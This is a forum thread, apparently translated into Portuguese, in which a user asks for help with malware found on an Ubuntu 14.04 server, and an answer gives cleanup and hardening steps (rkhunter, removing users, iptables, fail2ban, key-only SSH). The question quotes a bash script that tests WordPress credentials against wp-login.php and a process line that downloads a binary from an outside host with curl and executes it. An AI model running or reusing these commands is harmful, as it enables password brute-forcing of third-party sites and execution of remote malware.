Arquivos incomuns na pasta temporária UBUNTU SERVER 14.04

Navegue suas respostas
0

Eu tenho arquivos incomuns na pasta tb do ubuntu. Alguém pode lançar alguma luz sobre isso e quais poderiam ser os meus passos de prevenção.

Na pasta temp existem 2 arquivos nomeados Script e URL

Quando eu nano arquivo script : 

#!/bin/bash
if curl -s  --max-time 7 -d "log=$1" -d "pwd=$2" -d "wp-submit=Log+In" 
"$3"/wp-login.php  -i |grep -a "path=/wp-content/pl$

then
echo $3 $1 $2
fi

e nano url mostram resultados não legíveis

Além disso, o seguinte processo malicioso está sendo executado no comando HTOP 

\par 2 S  0.0  0.0  0:00.00 sh -c cd /tmp;rm -rf url*;cd /tmp;rm -rf url;curl -O socks5.so/url;chmod 777 url;./url
\par 4 S  0.0  0.0  0:00.00 ./url

Quando perguntar o ID do processo: 

#ls -al /proc/12186/exe

Output is:
someuser someuser 0 Jun 17 06:06 /proc/12186/exe -> /bin/dash

quando eu removo os arquivos na pasta TEMP, ele continua regenerando, como posso parar isso. Acredito que esteja usando o meu servidor para atacar os sites de wordpress instalados.

    
por KAKA BOOKIE 17.06.2015 / 09:10

1 resposta

0

Você foi p0wned . Pode ser extremamente difícil se livrar disso.

Você pode baixar o pacote rkhunter , atualizá-lo, 

    rkhunter --update

desconecte o seu PC da rede, execute-o: 

    rkhunter -c

Se relatar a presença de um rootkit, sua melhor chance é reinstalar o sistema operacional. De fato, a presença de um rootkit em geral indica um oponente experiente e bem equipado, lutando com quem é possível, mas apenas com muito tempo e competência técnica, o que é muito mais do que o formato deste fórum pode oferecer.

Se, em vez disso, não houver nenhum vestígio de um rootkit, você poderá iniciar (seu computador ainda fora da rede) a limpeza do seu computador da seguinte forma:

  1. altere sua senha;
  2. edite o arquivo sudo (com visudo) e elimine todos os usuários que não sejam usuários do sistema ou você mesmo.
  3. procure por (eventuais) outros usuários, com um shell de login em / etc / passwd, e remova-os.
  4. remova os diretórios iniciais desses usuários.
  5. desative o daemon ssh completamente.
  6. Defina um relógio por meio de inotifywait em arquivos comuns do sistema, como / var / log / wtmp.
  7. configure o iptables para registrar todas as tentativas de conexão e bloquear todo o tráfego de conexão, exceto em uma porta não padrão para ssh, e aquela relacionada a conexões existentes iniciadas por você mesmo.

Então, quando você voltar a ficar on-line, faça o download do fail2ban sem instalá-lo, saia da rede, inicie o daemon ssh, instale o fail2ban.

Agora altere seu ssh para usar somente chaves criptográficas, para barrar logins root e logins de senha. Agora você pode voltar para a Internet e ler alguns página de blog razoável sobre como proteger sua máquina Linux .

    
por 17.06.2015 / 10:13

Tags

Como definir a saída do FFmpeg para a saída de uma placa de vídeo em vez de um arquivo? Isso é possível? Como acessar sites específicos automaticamente por meio de um servidor proxy no Google Chrome?